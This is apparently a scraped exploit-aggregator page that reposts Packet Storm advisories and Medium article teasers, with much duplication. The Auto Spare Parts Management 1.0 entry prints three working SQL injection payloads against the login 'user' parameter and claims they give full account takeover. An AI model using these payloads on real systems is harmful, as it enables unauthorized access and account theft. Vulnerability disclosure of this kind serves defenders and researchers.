Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Auto Spare Parts Management 1.0 SQL Injection
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Auto Spare Parts Management version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Auto Spare Parts Management 1.0 SQL Injection
https://3.bp.blogspot.com/-Qhp4qePCt4w/WWlvgnoLBHI/AAAAAAAAIQQ/Pg-5D4V1nfk8Sq6EZO_I88mZqTiN0MsZgCLcBGAs/s1600/h89.png
Auto Spare Parts Management version 1.0 suffers from a remote SQL injection vulnerability.
MD5 |
4b39f3991fe69b8ce93d5ad92150f7ceDownload
## Title: Auto-Spare-Parts-Management v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.19.2022
## Vendor: https://github.com/pavanpatil45
## Software: https://github.com/pavanpatil45/Auto-Spare-Parts-Management
## Description:
The Referer HTTP header on Auto-Spare-Parts-Management v1.0 system
appears to be vulnerable to SQL injection attacks, parameter `user`.
The payload ' was submitted in the Referer HTTP header, and a database
error message was returned.
The attacker from outside can take control of all accounts of this
system by using this vulnerability!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: user (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user=admin1' AND 5432=5432 AND
'MXPx'='MXPx&password=admin1&btnlogin=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: user=admin1' AND (SELECT 8861 FROM(SELECT
COUNT(*),CONCAT(0x71786b6271,(SELECT
(ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'aOSP'='aOSP&password=admin1&btnlogin=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user=admin1' AND (SELECT 1749 FROM
(SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/pavanpatil45/Auto-Spare-Parts-Management)
## Proof and Exploit:
[href](https://streamable.com/qq19po)
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Auto Spare Parts Management 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Thinfinity VirtualUI 2.5.41.0 IFRAME Injection
https://2.bp.blogspot.com/-9-swdJydXNw/WWlu-Z7JktI/AAAAAAAAIJ0/CxXmre-Va7QW9KRwpgdSNcn8lp40qwLtQCLcBGAs/s1600/h117.png
Thinfinity VirtualUI version 2.5.41.0 suffers from an iframe injection vulnerability.
MD5 |
Download
Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Thinfinity VirtualUI 2.5.41.0 IFRAME Injection
https://2.bp.blogspot.com/-9-swdJydXNw/WWlu-Z7JktI/AAAAAAAAIJ0/CxXmre-Va7QW9KRwpgdSNcn8lp40qwLtQCLcBGAs/s1600/h117.png
Thinfinity VirtualUI version 2.5.41.0 suffers from an iframe injection vulnerability.
MD5 |
c81a621d50748a9d46e770fa7afe4b1eDownload
Exploit Title: Thinfinity VirtualUI 2.5.41.0 - IFRAME Injection
Date: 16/12/2021
Exploit Author: Daniel Morales
Vendor: https://www.cybelesoft.com
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Thinfinity VirtualUI 2.5.41.0 IFRAME Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
eCPTX Exam Review by 0xJin
https://0xjin.medium.com/ecptx-exam-review-by-0xjin-7602232b53d3?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://0xjin.medium.com/ecptx-exam-review-by-0xjin-7602232b53d3?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
eCPTX Exam Review by 0xJin
eLearnSecurity Certified Penetration Tester eXtreme
eLearnSecurity Certified Penetration Tester eXtremeContinue reading on Medium » (https://0xjin.medium.com/ecptx-exam-review-by-0xjin-7602232b53d3?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
eCPTX Exam Review by 0xJin
eLearnSecurity Certified Penetration Tester eXtreme
What an injection into jQuery-selector can lead to
I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly).Continue reading on Medium »
Read more...
I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly).Continue reading on Medium »
Read more...
eCPTX Exam Review by 0xJin
eLearnSecurity Certified Penetration Tester eXtremeContinue reading on Medium »
Read more...
eLearnSecurity Certified Penetration Tester eXtremeContinue reading on Medium »
Read more...
eCPTX Exam Review by 0xJin
eLearnSecurity Certified Penetration Tester eXtremeContinue reading on Medium »
Read more...
eLearnSecurity Certified Penetration Tester eXtremeContinue reading on Medium »
Read more...
Healing blind injections
https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Healing blind injections
What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones?
What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones?Continue reading on Medium » (https://medium.com/@Rend_/healing-blind-injections-df30b9e0e06f?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Healing blind injections
What if I told you there is a way to heal the blind SQL injections and turn them into healthy union-based ones?
Hacking on Medium
How to Create a Strong Cybersecurity Culture in Your Organization
https://cdn-images-1.medium.com/max/2600/0*g6AXnWa09k6lF_e7
The cybersecurity culture of an organization encompasses the knowledge, awareness, attitudes and behaviors of employees regarding the…
Continue reading on Netacea »
___________________________
@hacking_Attack
@Hacking_Video
How to Create a Strong Cybersecurity Culture in Your Organization
https://cdn-images-1.medium.com/max/2600/0*g6AXnWa09k6lF_e7
The cybersecurity culture of an organization encompasses the knowledge, awareness, attitudes and behaviors of employees regarding the…
Continue reading on Netacea »
___________________________
@hacking_Attack
@Hacking_Video
Medium
How to Create a Strong Cybersecurity Culture in Your Organization
The cybersecurity culture of an organization encompasses the knowledge, awareness, attitudes and behaviors of employees regarding the…
Hacking on Medium
Here’s why you need to become a DevSecOps Engineer in 2022.
https://cdn-images-1.medium.com/max/2600/0*Ibx9epgKK4ZjLkvx
And why there is demand to be taken advantage of.
Continue reading on TheDevOpsGuy »
___________________________
@hacking_Attack
@Hacking_Video
Here’s why you need to become a DevSecOps Engineer in 2022.
https://cdn-images-1.medium.com/max/2600/0*Ibx9epgKK4ZjLkvx
And why there is demand to be taken advantage of.
Continue reading on TheDevOpsGuy »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Here’s why you need to become a DevSecOps Engineer in 2022.
And why there is demand to be taken advantage of.